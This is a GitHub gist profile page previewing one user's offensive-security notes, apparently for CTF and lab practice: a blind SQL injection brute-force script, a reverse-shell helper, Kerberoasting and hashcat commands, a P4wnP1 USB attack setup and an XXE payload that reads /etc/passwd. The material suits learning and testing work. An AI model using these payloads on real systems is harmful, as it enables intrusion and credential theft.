Skip to content

Instantly share code, notes, and snippets.

View AvasDream's full-sized avatar
🎯
Focusing

AvasDream

🎯
Focusing
131 followers · 161 following
View GitHub Profile
@AvasDream
AvasDream / bbcheatsheet.md
Last active October 12, 2019 14:24
Bug Bounty Cheatsheet

Reconnaissance

DNS Recon

DNS Record Types:

A (Host address)
AAAA (IPv6 host address)
ALIAS (Auto resolved alias)
@AvasDream
AvasDream / snippets.md
Last active March 14, 2019 18:16
Python Hacking Snippets

Blind boolean based union sql injection bruteforcing

# !/usr/bin/python3
import requests
import timeit

start = timeit.default_timer()
URL = "http://35.227.24.107:5001/b3838cbb72/login"
QUERY = "admin' union select password from admins where id=1 and password like \""
@AvasDream
AvasDream / zabbix.sh
Last active November 23, 2019 09:08
Easy install script for Zabbix 4.0 on Ubuntu 16.04 Server, works also with Ubuntu 18.04 but needs ppa of 16.04 in sources.list
#!/bin/bash
version=4.0.2
echo "execute with sudo privileges"
sudo true
echo "Install GCC"
sudo apt install gcc -y > /dev/null
echo "Install make"
sudo apt install make -y > /dev/null
echo "install postgresql server"
@AvasDream
AvasDream / revshell.md
Last active May 29, 2019 15:08
Bash Function to create a reverseshell from tun0 interface. Might come in handy in CTFs or HackTheBox.
  • Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337

INF=tun0
PORT=1337
@AvasDream
AvasDream / String-manipulation.md
Last active October 14, 2018 12:53
My personal cheatsheet for String manipulation in Linux

From upper to lowercase

cat string | tr '[:upper:]' '[:lower:]

Cut spaces from string

tr -d ' '

@AvasDream
AvasDream / privesc.md
Last active October 8, 2018 13:35
Ressources for privilege escalation.

Windows Kerber roasting

Only possible with valid credentials and kerberos.

GetUserSPNs.py -request -dc-ip IP DOMAIN/USER

Retreive Hash with impacket.

hashcat -m 13100 --force -a 0 keberos_hash /usr/share/wordlists/rockyou.txt

@AvasDream
AvasDream / p4wnpi.md
Last active September 24, 2018 15:16
P4wnPi Setup

Project

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository

Intsallation

Copy image to sd card

dd if=<Source> of=<destination> bs=512 status=progress
@AvasDream
AvasDream / Kali Linux easy install.md
Last active February 8, 2024 13:22

Script for easier installation of Kali tools

Missing Browser Extensions!

  • Built with
  • Foxy Proxy
  • Cache Cleaner
  • Adblocker

Manual execution of install Scripts for Veil and Empire needed.

#! /bin/bash
@AvasDream
AvasDream / overflow.md
Last active July 15, 2018 20:13

Introduction

To better grasp the understanding of Bufferoverflows I decided to make and document some exercises with this topic.

The exploit exercises are mainly from exploit-exercises.com.

Stackoverflow - When the execution stack grows beyond the memory that is reserved for it

Bufferoverflow - When a programm writes beyond the end of the memory allocated for any buffer (Heap & Stack).

@AvasDream
AvasDream / XML-external-entity-script.md
Last active July 7, 2018 10:27
Helper Script for exploiting xxe

Basics

Source

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
 mypass